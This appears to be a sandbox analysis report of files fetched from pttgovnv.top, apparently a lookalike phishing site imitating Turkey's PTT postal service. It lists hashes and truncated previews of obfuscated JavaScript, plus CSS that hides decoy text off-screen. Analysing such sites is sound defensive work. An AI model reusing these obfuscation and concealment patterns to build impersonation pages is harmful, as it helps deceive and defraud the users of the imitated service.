    SSDEEP:48:lp6uGkcrVAGpAL+RdZyFjHyoH/XlukT2F1bziHpciH/oH/w:lERr6DCZydHRH/XluB1niHaiHgH/w
    MD5:00B17816E749FFE05B96561CFA6EC7FE
    SHA1:55CB98153952808CC274D7608D17A36897921BF8
    SHA-256:9A59F865220295BD945A89A98BA32654D6AD01CE00D9F2FA098238C665D8D7BB
    SHA-512:2083C2287146581310A78C4E79FFD9C726B218767D40A64A7CACBE0CF28BBBE2A1ABA173B26F273C995D19F16D1BD3A92759DB97171C7DE5149A37E4EA3F1E9C
    Malicious:false
    Reputation:low
    URL:https://pttgovnv.top/help/
    Preview:<!DOCTYPE html>.<html>. <head>. <meta charset="UTF-8" />. <meta. name="viewport". content="width=device-width, initial-scale=1.0, user-scalable=no". />. <script type="module" crossorigin src="./assets/index-f5457718.js"></script>. <link rel="stylesheet" href="./assets/f6170fbbkFGym.css">. <script type="module">import.meta.url;import("_").catch(()=>1);async function* g(){};if(location.protocol!="file:"){window.__vite_is_modern_browser=true}</script>. <script type="module">!function(){if(window.__vite_is_modern_browser)return;console.warn("vite: loading legacy chunks, syntax error above and the same error below should be ignored");var e=document.getElementById("vite-legacy-polyfill"),n=document.createElement("script");n.src=e.src,n.onload=function(){System.import(document.getElementById('vite-legacy-entry').getAttribute('data-src'))},document.body.appendChild(n)}();</script>. </head>. <body>. <div id="app"></div>. . <script nomodule>!function(){
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:ASCII text, with very long lines (35443), with no line terminators
    Category:dropped
    Size (bytes):35443
    Entropy (8bit):5.338743939035259
    Encrypted:false
    SSDEEP:768:8qiDiLzUsyD9YgG+UmAn2O1pRv42f9lUA7h2+JzQCjSpaZ/tgaTkU0ZAm/X1qnyw:8qOu42kEjzrpNX
    MD5:BC5635E1DA3D2182E2FDC5D1FAAE7853
    SHA1:40762193C4C05DAFAF5DD5E6DCE57608638FB847
    SHA-256:0563B1A4C7810B2DA5B4D1762D4C3281B62C0B082D4EBB6ACECD2CF88CB9BB14
    SHA-512:69C23223AAEE6A3C83133FA3C63C9A7AC361C8FDF0AF89BADF15A2D9CAFD132C0E0A42A77BD950B4539357F56082F5764897A849B9039C6F58DA7C82D9F6B938
    Malicious:false
    Reputation:low
    Preview:var a23_0x2208a5=a23_0x1b94;(function(_0x171a22,_0x29dadb){var _0x13e885=a23_0x1b94,_0x13bea8=_0x171a22();while(!![]){try{var _0x4cc568=parseInt(_0x13e885(0x2c5))/0x1*(parseInt(_0x13e885(0x1e8))/0x2)+parseInt(_0x13e885(0x1fb))/0x3*(-parseInt(_0x13e885(0x265))/0x4)+-parseInt(_0x13e885(0x2aa))/0x5+-parseInt(_0x13e885(0x238))/0x6+-parseInt(_0x13e885(0x1cd))/0x7*(-parseInt(_0x13e885(0x263))/0x8)+-parseInt(_0x13e885(0x26f))/0x9+parseInt(_0x13e885(0x250))/0xa*(parseInt(_0x13e885(0x2ea))/0xb);if(_0x4cc568===_0x29dadb)break;else _0x13bea8['push'](_0x13bea8['shift']());}catch(_0x334a50){_0x13bea8['push'](_0x13bea8['shift']());}}}(a23_0x1a58,0x89c68));import{l as a23_0x492e05,_ as a23_0x185bee}from'./index-f5457718.js';import{r as a23_0x5e74b1}from'./09bf01f8JxKnW.js';import{m as a23_0x5e89b9}from'./ec21517bJxKnW.js';var E=function(_0x3be998,_0x2f67eb){var _0x5590cd=a23_0x1b94;return E=Object['setPrototy'+_0x5590cd(0x2d2)]||{'__proto__':[]}instanceof Array&&function(_0x773e98,_0x1801a7){var _0x3
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:ASCII text, with very long lines (322)
    Category:downloaded
    Size (bytes):323
    Entropy (8bit):4.962097992563931
    Encrypted:false
    SSDEEP:6:ZrXn6dB0HzMCRsCdgPbuxsMRIbVZptOzMmNoYmyCX:F6H0T4CkbuNmtg/1C
    MD5:BFFC12E40F0D227772826CC4AB6B1D99
    SHA1:348BED4D1364D4933BBFE5FEB5F9C61E3C5A1A6E
    SHA-256:4CD1EC684CE1C4F864A8E95F9F7695C7F708160192531FF8E55FC5023ABF5B64
    SHA-512:DC372EC6D46D3E58619E5F9DB56F4F26D683F79507EBB3A6F871B4D962BC1CB32B73362FCDFDACEB1692CE501ACD48575370C7B32E3C157FA9743CD2E7352B0A
    Malicious:false
    Reputation:low
    URL:https://pttgovnv.top/help/assets/4cd1ec68kFGym.css
    Preview:h1.title[data-v-fe5ae731]{color:#24549d;font-size:2rem;text-align:center}div.content[data-v-fe5ae731]{padding:10px;background-color:#f2f2f2;border-radius:3px}ul[data-v-fe5ae731]{list-style:disc outside none!important;list-style:initial!important}ul[data-v-fe5ae731]{padding-left:14px}ul li[data-v-fe5ae731]{margin-top:8px}.
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:ASCII text, with very long lines (22359)
    Category:downloaded
    Size (bytes):53487
    Entropy (8bit):5.658840042448801
    Encrypted:false
    SSDEEP:768:j1MrlEtazMvS1FVnUbMsYG7JYYG7BfVSms88E+g9X7:j1E9UbcSbSBb
    MD5:9EC37AD8C9D7CACCBA07795B4155F169
    SHA1:9179073C6D56F591B4298CEFB72B02819E51C647
    SHA-256:2DD339F2861FCFFD8B0A703CA7F81253542743D9936B33D2E15F2FF89D46D084
    SHA-512:2594C9230996A13AFFCC132EEAB431179308C2C389345FABB44B26E950783FBB9554CA5CEE7AE54E4B9B030F05253036284977FD994EA95A0EFF679A08DCB5CF
    Malicious:false
    Reputation:low
    URL:https://pttgovnv.top/help/assets/2dd339f2kFGym.css
    Preview:@media screen and (min-width: 767px){.main-content{margin-top:90px}}@media screen and (min-width: 769px) and (max-width: 1047px){.main-content{margin-top:180px}}body #s4-ribbonrow{display:none}@media screen and (max-width: 468px){#webobj_portal{padding-top:30px}}body{overflow:hidden;background-size:cover;background-repeat:no-repeat}.ms-backgroundImage{background-image:url(./8b4af40ckFGym.css)}#s4-ribbonrow{position:relative}#s4-workspace{overflow:auto;position:relative}h3{margin:auto}img{-webkit-tap-highlight-color:transparent}iframe{border:0}input,button{vertical-align:middle}button{min-width:6em;margin-left:10px}input[type=button]:hover,input[type=reset]:hover,input[type=submit]:hover,button:hover{border-color:#92c0e0;background-color:#e6f2fa}input[type=button]:active,input[type=reset]:active,input[type=submit]:active,button:active{border-color:#2a8dd4;background-color:#92b7d1;background-color:#92c0e0}a:visited{color:#639;-webkit-text-decoration:none;text-decoration:none}a:hover,a:ac
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:Unicode text, UTF-8 text, with very long lines (6082), with no line terminators
    Category:downloaded
    Size (bytes):6098
    Entropy (8bit):5.345197330361691
    Encrypted:false
    SSDEEP:96:XLD0GPxeMvMx+DCykuvej08WkE0EPO9n4gyk8gsubpme1C8Ed0UOa3NeS9eJSrBF:v0qeMkx+DCIveU8So4gyk8gsubpme1CT
    MD5:0DA448566DB5D334688029F4D8DA8025
    SHA1:9AE1FA7FEE699B2E08651E38850F4B73002191F2
    SHA-256:B532E6762E739AB6A28B435316707D8D90BC1CFCF1BBF430127481320C64B2ED
    SHA-512:9A29CB97F174931A186F465013B04939D63E18727D31235338976365E4C35588F98EEB50ADE4B087FD90D7B79D41514D3596D9C5446760A20773CCFF26663530
    Malicious:false
    Reputation:low
    URL:https://pttgovnv.top/help/assets/cbcdcea5JxKnW.js
    Preview:const a26_0x2f6b2e=a26_0x2195;(function(_0x4b26d5,_0x58f703){const _0x55ba02=a26_0x2195,_0x56ed15=_0x4b26d5();while(!![]){try{const _0x1c2f33=-parseInt(_0x55ba02(0x163))/0x1+-parseInt(_0x55ba02(0x19a))/0x2*(parseInt(_0x55ba02(0x160))/0x3)+parseInt(_0x55ba02(0x17c))/0x4*(-parseInt(_0x55ba02(0x172))/0x5)+parseInt(_0x55ba02(0x186))/0x6+-parseInt(_0x55ba02(0x185))/0x7+-parseInt(_0x55ba02(0x173))/0x8+parseInt(_0x55ba02(0x15f))/0x9;if(_0x1c2f33===_0x58f703)break;else _0x56ed15['push'](_0x56ed15['shift']());}catch(_0x3aa38c){_0x56ed15['push'](_0x56ed15['shift']());}}}(a26_0x2d8e,0xe16ee));const a26_0x523979=(function(){let _0x1acf99=!![];return function(_0x2d3219,_0x2027c3){const _0x24a505=_0x1acf99?function(){const _0x248cf8=a26_0x2195;if(_0x2027c3){const _0x626e42=_0x2027c3[_0x248cf8(0x18e)](_0x2d3219,arguments);return _0x2027c3=null,_0x626e42;}}:function(){};return _0x1acf99=![],_0x24a505;};}()),a26_0x5b0a0d=a26_0x523979(this,function(){const _0x177b71=a26_0x2195;return a26_0x5b0a0d[_0x177
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:ASCII text, with very long lines (2711), with no line terminators
    Category:dropped
    Size (bytes):2711
    Entropy (8bit):5.297296092227412
    Encrypted:false
    SSDEEP:48:HX2Ad1LBPjwWtQkMpNbdyQNfSWsn3IQD/hACyEjJPFncz:bLlrxadFdyTWsTFyCPFncz
    MD5:A75A86776204D842DB35D8ACA1B199FB
    SHA1:BA065388EE5E866897DBC75E163FE916B6A35623
    SHA-256:0914A1DE2F752F476BE576F73AA8EA358F8044FC0F7B6B29C76CE08853B4C889
    SHA-512:CD48C0DBC2431CC20B7A1CE96BB8B87DE856C4AA69AC95B617B6F8117642F1DA16709C381D30BBADCD68897A6AE6D887D76A3D8071843BB5965EB8BB1234914A
    Malicious:false
    Reputation:low
    Preview:(function(_0x3d87db,_0x4b5e47){const _0xfeb21e=a31_0x355e,_0x41d4e4=_0x3d87db();while(!![]){try{const _0xf4c543=parseInt(_0xfeb21e(0x126))/0x1*(parseInt(_0xfeb21e(0x12d))/0x2)+parseInt(_0xfeb21e(0x12b))/0x3+-parseInt(_0xfeb21e(0x12c))/0x4+-parseInt(_0xfeb21e(0x13a))/0x5*(-parseInt(_0xfeb21e(0x13e))/0x6)+-parseInt(_0xfeb21e(0x13b))/0x7+parseInt(_0xfeb21e(0x137))/0x8*(-parseInt(_0xfeb21e(0x132))/0x9)+parseInt(_0xfeb21e(0x125))/0xa*(parseInt(_0xfeb21e(0x13d))/0xb);if(_0xf4c543===_0x4b5e47)break;else _0x41d4e4['push'](_0x41d4e4['shift']());}catch(_0x4a9f2a){_0x41d4e4['push'](_0x41d4e4['shift']());}}}(a31_0x36de,0xbf971));const a31_0x28e7fb=(function(){let _0xc82145=!![];return function(_0x3eb778,_0x20dec3){const _0x5c3b89=_0xc82145?function(){const _0x3ac2d5=a31_0x355e;if(_0x20dec3){const _0x25b304=_0x20dec3[_0x3ac2d5(0x12a)](_0x3eb778,arguments);return _0x20dec3=null,_0x25b304;}}:function(){};return _0xc82145=![],_0x5c3b89;};}()),a31_0x193cc0=a31_0x28e7fb(this,function(){const _0xd7d826=a
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:ASCII text, with very long lines (951)
    Category:downloaded
    Size (bytes):952
    Entropy (8bit):5.086003380220007
    Encrypted:false
    SSDEEP:24:dnkaFfQFfpiVVDoneFVZtYNwE+Lmo4ot2owKgo/7:dnkaFfQFfpOVcneFFswE+LmvRNpu
    MD5:32FAC03C421DCBA16FB4A965FC089E7A
    SHA1:F6AC75910F20381D4478C1D302B4DD30FD1EE9AD
    SHA-256:F6170FBBEE0AF98D737510B5689B31D78CF4E9A152590E594175B79212210911
    SHA-512:DC554F5BD2C040133218F74A8CAF624789B2AFFF8505547899D91BFDD03B70EF5DEB7AC9834E255CAE9177C61E5344728B13A0546E956B723E65F5D1C4D3EFD8
    Malicious:false
    Reputation:low
    URL:https://pttgovnv.top/help/assets/f6170fbbkFGym.css
    Preview:@keyframes g-loading-bgAnim{0%,to{background-color:rgba(255,255,255,.635)}50%{background-color:rgba(255,255,255,0)}}.g-loading-mask{width:100vw;height:100vh;display:flex;justify-content:center;align-items:center;position:fixed;left:0;top:0;animation:g-loading-bgAnim 3s linear infinite;opacity:0;-webkit-user-select:none;-moz-user-select:none;user-select:none;pointer-events:none;transition:all .3s;z-index:999999999}.g-loading-mask.show{opacity:1;pointer-events:initial}.g-loading-mask .loading{width:38px;height:38px}html,body{padding:0;border:0;margin:0;overflow-x:hidden;overflow-y:auto;overflow:hidden auto}[data-t]{font-size:1em!important}[data-t]:after{content:attr(data-t) " "}[class^=_][class$=_]{color:transparent!important}[class^=_][class$=_]{display:inline-block;pointer-events:none;position:absolute;left:1000vw}[class^=_][class$=_]::-moz-selection{color:transparent!important}[class^=_][class$=_]::selection{color:transparent!important}.
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:PNG image data, 590 x 351, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):15215
    Entropy (8bit):7.966328191753387
    Encrypted:false
    SSDEEP:384:4v9zK76/9r8Q4rAhRsxAb/g55HmmcTI3368oiRw:4vI2ltko4sO5Hmziw
    MD5:7BB31B9EF5F35D816F9BC7A816C800D7
    SHA1:4F0351D0E82074BB2E94CD3F1A4CD96E3A7EDA0F
    SHA-256:4717A50BEB793AAE083B0FCA163B549706F873650D1F45812A364AF74084D804
    SHA-512:6B5B77217257C4EB9185949EB6BC87A1794E5126A047E78B4DF08757AD976E312EC66497251DEE2E31860E40925EC740A5D29605683B4AB4CFDA80261C12E7E4
    Malicious:false
    Reputation:low
    Preview:.PNG........IHDR...N..._......;CV....sRGB.........gAMA......a.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<...!tEXtCreation Time.2018:09:07 09:16:06D/iU..:.IDATx^...vT.....a.8W...h...|..'Y0.|.......W`y.V&.W...$C5.y...x..}.]U-..?}.W..~..7/.....]...O-_..Y...0..L.K...".....C....Y.rn^.i+....9.~.p.y~k.h....R?...L.......Q"8..X>.=.Z.M~o.yS.b[.....C...T.\.Pz.~...7La~^...g~..ex..0"T..+H..V..p..c~...].b.......Av....py.-.)...../..2Fp.. c..6.......i.........%.....>(......(.........%....^......P.....P.....\h../........u@........N..C*Q.....!...Ex......P..r.......BO.\k3.e1'H.@..N@.2.....5...0F..l.*.Y.b......Ap.j...T..J). L....N@.....*~....)e..9*.b.~W.....[.'..u.;..@..:.B... 8.-X..}`?L_..(.@...n....[.......k 8.-.Y.k......J.`...e?.8...hI_..}9nJW6D..@...'.Ur.p..y...<.*.cFp.Z.t.x.>..`.9.X0..@n.N@......Q6@16.@..N@G.:.%G.!].r.Y.......t..>.........0.)V.0..A^...N......X.3.b.z.....M.9S...........O.9U).} 8.=!<.../c..J.h......i...{.....9A.@].'.g.......Ep..@x..A
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:ASCII text, with very long lines (1892), with no line terminators
    Category:downloaded
    Size (bytes):1892
    Entropy (8bit):5.3199265720505045
    Encrypted:false
    SSDEEP:48:9MxFGgXen1yVqPNzTOv+Pgdxj2zRxpUky6fRK2:9MPGgYyV8NrgdV29vUkVfRK2
    MD5:BD7525226CFF3D63880AB3E3783107C4
    SHA1:B69F85592A127F736AD8B04F0DBB378295463C85
    SHA-256:81F05B60B2139D0F055A533BDEED2E2BC3E6142A9E779A0C644455F1BBF3F9C1
    SHA-512:9D33EACA3352F03C946DF20AEBA8ECB5430A0881A0150748E3C217400CD965FEE7F379D0D21FEA110BCE7EC43BE8BBD0230A2239EA453175C8900752B1B6FBA9
    Malicious:false
    Reputation:low
    URL:https://pttgovnv.top/help/assets/c27b6911JxKnW.js
    Preview:function a24_0x5346(_0x4030c5,_0x31eecd){const _0x556825=a24_0x324b();return a24_0x5346=function(_0x3b0de7,_0xce0cb2){_0x3b0de7=_0x3b0de7-0x67;let _0x324bdb=_0x556825[_0x3b0de7];return _0x324bdb;},a24_0x5346(_0x4030c5,_0x31eecd);}function a24_0x324b(){const _0xb022b5=['1002222jJEtDH','toString','254AqdTdL','__vccOpts','5ToDzfk','1085710vVxwgb','528906UwedBM','search','constructo','54xBZeip','10320728oLohLb','353TqOCxG','(((.+)+)+)','2031164WFthFE','8CvfsLG','226828xuWwpQ'];a24_0x324b=function(){return _0xb022b5;};return a24_0x324b();}(function(_0x2907ff,_0x1577d4){const _0x4680c9=a24_0x5346,_0x3fc7cd=_0x2907ff();while(!![]){try{const _0x4b2c9c=parseInt(_0x4680c9(0x6b))/0x1*(-parseInt(_0x4680c9(0x72))/0x2)+parseInt(_0x4680c9(0x76))/0x3+-parseInt(_0x4680c9(0x6d))/0x4*(parseInt(_0x4680c9(0x74))/0x5)+parseInt(_0x4680c9(0x69))/0x6*(-parseInt(_0x4680c9(0x6f))/0x7)+parseInt(_0x4680c9(0x6e))/0x8*(parseInt(_0x4680c9(0x70))/0x9)+-parseInt(_0x4680c9(0x75))/0xa+parseInt(_0x4680c9(0x6a))/0xb;if(_0x
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:Unicode text, UTF-8 text, with very long lines (4650), with no line terminators
    Category:downloaded
    Size (bytes):4708
    Entropy (8bit):5.24982094326148
    Encrypted:false
    SSDEEP:96:LhLALv2dQ13a19GeEc2mvDjHqiqV8SYn1u7+eNEgyJY47186ee7f1lV:xz5Ec1vfqiqVg1u7+eyPY47186ee7f1D
    MD5:0DA2A6E8828A9D4461A27CC813A21CD1
    SHA1:32727963FEC3E91E3951E0551ABA8AC7F45FC89D
    SHA-256:8A87A08F2C1C9AE855AACA4BD6F26B5DE44F28EA9810039F93333CC8E59FD166
    SHA-512:4F6E559C68F275E9C2F2C3C8D04392049C75856279387E74EEF2BD791DE653A81231C8B08BF86C712C905CD2C603A5298B092BCA2F7A29092AD8CD1E1F35FDA1
    Malicious:false
    Reputation:low
    URL:https://pttgovnv.top/help/assets/77985128JxKnW.js
    Preview:const a16_0x1a0ab1=a16_0xb309;(function(_0xc62027,_0x4c3503){const _0x472517=a16_0xb309,_0x18f288=_0xc62027();while(!![]){try{const _0x10a64b=parseInt(_0x472517(0x14b))/0x1+-parseInt(_0x472517(0x13f))/0x2+parseInt(_0x472517(0x12d))/0x3+-parseInt(_0x472517(0x12a))/0x4*(parseInt(_0x472517(0x145))/0x5)+parseInt(_0x472517(0x129))/0x6*(parseInt(_0x472517(0x144))/0x7)+-parseInt(_0x472517(0x12e))/0x8*(parseInt(_0x472517(0x141))/0x9)+parseInt(_0x472517(0x132))/0xa;if(_0x10a64b===_0x4c3503)break;else _0x18f288['push'](_0x18f288['shift']());}catch(_0x2102de){_0x18f288['push'](_0x18f288['shift']());}}}(a16_0x4681,0x6ebf6));const a16_0xaa59f7=(function(){let _0x410bd1=!![];return function(_0x3e5c07,_0x31cc45){const _0x5c21e7=_0x410bd1?function(){const _0x3aa6a6=a16_0xb309;if(_0x31cc45){const _0x21f428=_0x31cc45[_0x3aa6a6(0x124)](_0x3e5c07,arguments);return _0x31cc45=null,_0x21f428;}}:function(){};return _0x410bd1=![],_0x5c21e7;};}()),a16_0x8c9795=a16_0xaa59f7(this,function(){const _0x3aa272=a16_0x
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:Unicode text, UTF-8 text, with very long lines (65329), with no line terminators
    Category:downloaded
    Size (bytes):161114
    Entropy (8bit):5.144436389608998
    Encrypted:false
    SSDEEP:1536:9RohK1FtK8YlXSyGwjUnKznBGDhZB/FEG39tBV1z37fb7K0yF2dDIp:8hKuCyGwjUnKr+RbNtBV1z3LTNC
    MD5:C3DCC3BE21F2F8D1CF00E2E339C699D1
    SHA1:6BE6BC9EDAAA3403BF504DCEA10F7C2104102434
    SHA-256:992416AF8318FB013AED368155200BE56B07B52E70A21A80A1312E721ADAFBA5
    SHA-512:90F7410507965DAD04F076A10D3F10929AD7FEBA071901D6C17BBE014351AA48FF6C3168B3CDEC7F8153C1353EADCE8D5100907C88E73CC8CC88AD1BB4A07748
    Malicious:false
    Reputation:low
    URL:https://pttgovnv.top/help/assets/f3c7e6fbJxKnW.js
    Preview:const a33_0x762c71=a33_0xda6e;(function(_0x1d2039,_0x34a38e){const _0x303bae=a33_0xda6e,_0x22f25a=_0x1d2039();while(!![]){try{const _0xc1e4b0=-parseInt(_0x303bae(0x1f4))/0x1+-parseInt(_0x303bae(0x48a))/0x2*(-parseInt(_0x303bae(0x843))/0x3)+-parseInt(_0x303bae(0x1a8))/0x4+-parseInt(_0x303bae(0x896))/0x5*(parseInt(_0x303bae(0x146))/0x6)+-parseInt(_0x303bae(0x566))/0x7*(parseInt(_0x303bae(0x148))/0x8)+parseInt(_0x303bae(0xbb))/0x9+parseInt(_0x303bae(0x1a4))/0xa;if(_0xc1e4b0===_0x34a38e)break;else _0x22f25a['push'](_0x22f25a['shift']());}catch(_0x2a237d){_0x22f25a['push'](_0x22f25a['shift']());}}}(a33_0x38b1,0x5cb8c));function a33_0x38b1(){const _0x576f75=['em_ptt_abo','cz0ndHJhbn','>Tebligat\x20','ON\x22\x20id=\x22__','-32','/a></span>','kta_hizmet','YT48L2Rpdj','class=\x22ite','bank.ptt.g','l\x20ui-widge','tAk%C4%B1l','JvZHVjdGlt','age\x20has-su','#ptt_diger','FgIFJmdfMT','lateliUst.','Link\x22\x20clas','d-4\x22><a\x20id','-search\x20sx','tt_pttmati','klamalari','w.cimer.go','0\x20auto',
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:ASCII text, with very long lines (2711), with no line terminators
    Category:downloaded
    Size (bytes):2711
    Entropy (8bit):5.297296092227412
    Encrypted:false
    SSDEEP:48:HX2Ad1LBPjwWtQkMpNbdyQNfSWsn3IQD/hACyEjJPFncz:bLlrxadFdyTWsTFyCPFncz
    MD5:A75A86776204D842DB35D8ACA1B199FB
    SHA1:BA065388EE5E866897DBC75E163FE916B6A35623
    SHA-256:0914A1DE2F752F476BE576F73AA8EA358F8044FC0F7B6B29C76CE08853B4C889
    SHA-512:CD48C0DBC2431CC20B7A1CE96BB8B87DE856C4AA69AC95B617B6F8117642F1DA16709C381D30BBADCD68897A6AE6D887D76A3D8071843BB5965EB8BB1234914A
    Malicious:false
    Reputation:low
    URL:https://pttgovnv.top/help/assets/ec21517bJxKnW.js
    Preview:(function(_0x3d87db,_0x4b5e47){const _0xfeb21e=a31_0x355e,_0x41d4e4=_0x3d87db();while(!![]){try{const _0xf4c543=parseInt(_0xfeb21e(0x126))/0x1*(parseInt(_0xfeb21e(0x12d))/0x2)+parseInt(_0xfeb21e(0x12b))/0x3+-parseInt(_0xfeb21e(0x12c))/0x4+-parseInt(_0xfeb21e(0x13a))/0x5*(-parseInt(_0xfeb21e(0x13e))/0x6)+-parseInt(_0xfeb21e(0x13b))/0x7+parseInt(_0xfeb21e(0x137))/0x8*(-parseInt(_0xfeb21e(0x132))/0x9)+parseInt(_0xfeb21e(0x125))/0xa*(parseInt(_0xfeb21e(0x13d))/0xb);if(_0xf4c543===_0x4b5e47)break;else _0x41d4e4['push'](_0x41d4e4['shift']());}catch(_0x4a9f2a){_0x41d4e4['push'](_0x41d4e4['shift']());}}}(a31_0x36de,0xbf971));const a31_0x28e7fb=(function(){let _0xc82145=!![];return function(_0x3eb778,_0x20dec3){const _0x5c3b89=_0xc82145?function(){const _0x3ac2d5=a31_0x355e;if(_0x20dec3){const _0x25b304=_0x20dec3[_0x3ac2d5(0x12a)](_0x3eb778,arguments);return _0x20dec3=null,_0x25b304;}}:function(){};return _0xc82145=![],_0x5c3b89;};}()),a31_0x193cc0=a31_0x28e7fb(this,function(){const _0xd7d826=a
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:PNG image data, 590 x 351, 8-bit/color RGBA, non-interlaced
    Category:downloaded
    Size (bytes):15215
    Entropy (8bit):7.966328191753387
    Encrypted:false
    SSDEEP:384:4v9zK76/9r8Q4rAhRsxAb/g55HmmcTI3368oiRw:4vI2ltko4sO5Hmziw
    MD5:7BB31B9EF5F35D816F9BC7A816C800D7
    SHA1:4F0351D0E82074BB2E94CD3F1A4CD96E3A7EDA0F
    SHA-256:4717A50BEB793AAE083B0FCA163B549706F873650D1F45812A364AF74084D804
    SHA-512:6B5B77217257C4EB9185949EB6BC87A1794E5126A047E78B4DF08757AD976E312EC66497251DEE2E31860E40925EC740A5D29605683B4AB4CFDA80261C12E7E4
    Malicious:false
    Reputation:low
    URL:https://pttgovnv.top/favicon.ico
    Preview:.PNG........IHDR...N..._......;CV....sRGB.........gAMA......a.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<...!tEXtCreation Time.2018:09:07 09:16:06D/iU..:.IDATx^...vT.....a.8W...h...|..'Y0.|.......W`y.V&.W...$C5.y...x..}.]U-..?}.W..~..7/.....]...O-_..Y...0..L.K...".....C....Y.rn^.i+....9.~.p.y~k.h....R?...L.......Q"8..X>.=.Z.M~o.yS.b[.....C...T.\.Pz.~...7La~^...g~..ex..0"T..+H..V..p..c~...].b.......Av....py.-.)...../..2Fp.. c..6.......i.........%.....>(......(.........%....^......P.....P.....\h../........u@........N..C*Q.....!...Ex......P..r.......BO.\k3.e1'H.@..N@.2.....5...0F..l.*.Y.b......Ap.j...T..J). L....N@.....*~....)e..9*.b.~W.....[.'..u.;..@..:.B... 8.-X..}`?L_..(.@...n....[.......k 8.-.Y.k......J.`...e?.8...hI_..}9nJW6D..@...'.Ur.p..y...<.*.cFp.Z.t.x.>..`.9.X0..@n.N@......Q6@16.@..N@G.:.%G.!].r.Y.......t..>.........0.)V.0..A^...N......X.3.b.z.....M.9S...........O.9U).} 8.=!<.../c..J.h......i...{.....9A.@].'.g.......Ep..@x..A
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:Unicode text, UTF-8 text, with very long lines (6082), with no line terminators
    Category:dropped
    Size (bytes):6098
    Entropy (8bit):5.345197330361691
    Encrypted:false
    SSDEEP:96:XLD0GPxeMvMx+DCykuvej08WkE0EPO9n4gyk8gsubpme1C8Ed0UOa3NeS9eJSrBF:v0qeMkx+DCIveU8So4gyk8gsubpme1CT
    MD5:0DA448566DB5D334688029F4D8DA8025
    SHA1:9AE1FA7FEE699B2E08651E38850F4B73002191F2
    SHA-256:B532E6762E739AB6A28B435316707D8D90BC1CFCF1BBF430127481320C64B2ED
    SHA-512:9A29CB97F174931A186F465013B04939D63E18727D31235338976365E4C35588F98EEB50ADE4B087FD90D7B79D41514D3596D9C5446760A20773CCFF26663530
    Malicious:false
    Reputation:low
    Preview:const a26_0x2f6b2e=a26_0x2195;(function(_0x4b26d5,_0x58f703){const _0x55ba02=a26_0x2195,_0x56ed15=_0x4b26d5();while(!![]){try{const _0x1c2f33=-parseInt(_0x55ba02(0x163))/0x1+-parseInt(_0x55ba02(0x19a))/0x2*(parseInt(_0x55ba02(0x160))/0x3)+parseInt(_0x55ba02(0x17c))/0x4*(-parseInt(_0x55ba02(0x172))/0x5)+parseInt(_0x55ba02(0x186))/0x6+-parseInt(_0x55ba02(0x185))/0x7+-parseInt(_0x55ba02(0x173))/0x8+parseInt(_0x55ba02(0x15f))/0x9;if(_0x1c2f33===_0x58f703)break;else _0x56ed15['push'](_0x56ed15['shift']());}catch(_0x3aa38c){_0x56ed15['push'](_0x56ed15['shift']());}}}(a26_0x2d8e,0xe16ee));const a26_0x523979=(function(){let _0x1acf99=!![];return function(_0x2d3219,_0x2027c3){const _0x24a505=_0x1acf99?function(){const _0x248cf8=a26_0x2195;if(_0x2027c3){const _0x626e42=_0x2027c3[_0x248cf8(0x18e)](_0x2d3219,arguments);return _0x2027c3=null,_0x626e42;}}:function(){};return _0x1acf99=![],_0x24a505;};}()),a26_0x5b0a0d=a26_0x523979(this,function(){const _0x177b71=a26_0x2195;return a26_0x5b0a0d[_0x177
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:ASCII text, with very long lines (52146)
    Category:downloaded
    Size (bytes):53104
    Entropy (8bit):5.227530657260376
    Encrypted:false
    SSDEEP:1536:TMmDcX+V9NQhASRs39o2sBabuVV0cI7fxDRUZq:TRAX+7/RsBKuj0cI7VRUZq
    MD5:A776E06B72C85E797B740BD2D8B72177
    SHA1:178F266CB57B535F9026210BD0A81E2D4F661F54
    SHA-256:59E40E563B52ED0F9F6F98F299618ECCC9A75F47CFEE7B4125BBE5D548AD3C31
    SHA-512:80026AF0668053BF6BA7EC6BD5261F885CDDB06191E9EE2D60E8B05413FE579E44D9E6D24B682246209D3E08AA835917AF4B9BC50A2A4D265FC5F7DA6B16EE69
    Malicious:false
    Reputation:low
    URL:https://pttgovnv.top/help/assets/37d8eb31JxKnW.js
    Preview:const a9_0x13d023=a9_0x3647;(function(_0x1c0f4c,_0x5b4f7e){const _0x18c0e3=a9_0x3647,_0x35d09c=_0x1c0f4c();while(!![]){try{const _0xa80895=-parseInt(_0x18c0e3(0xfb))/0x1*(parseInt(_0x18c0e3(0x12e))/0x2)+parseInt(_0x18c0e3(0x19c))/0x3+-parseInt(_0x18c0e3(0x108))/0x4*(parseInt(_0x18c0e3(0x1aa))/0x5)+parseInt(_0x18c0e3(0x1a2))/0x6*(-parseInt(_0x18c0e3(0x1c8))/0x7)+-parseInt(_0x18c0e3(0x16a))/0x8+parseInt(_0x18c0e3(0x1be))/0x9+-parseInt(_0x18c0e3(0x14a))/0xa*(-parseInt(_0x18c0e3(0x106))/0xb);if(_0xa80895===_0x5b4f7e)break;else _0x35d09c['push'](_0x35d09c['shift']());}catch(_0x5b3a28){_0x35d09c['push'](_0x35d09c['shift']());}}}(a9_0x5403,0x5a626));import{s as a9_0x30f9d7,u as a9_0x1f3b06,x as a9_0x2ee3d1,r as a9_0x4c70bc,n as a9_0x803a5b,y as a9_0x3e60a4,d as a9_0x255cc3,z as a9_0x46165c,A as a9_0x2b3cd7,a as a9_0x5a4862,w as a9_0x273496}from'./index-f5457718.js';/*!. * vue-router v4.1.6. * (c) 2022 Eduardo San Martin Morote. * @license MIT. */.const G=typeof window<'u';function nt(_0xe
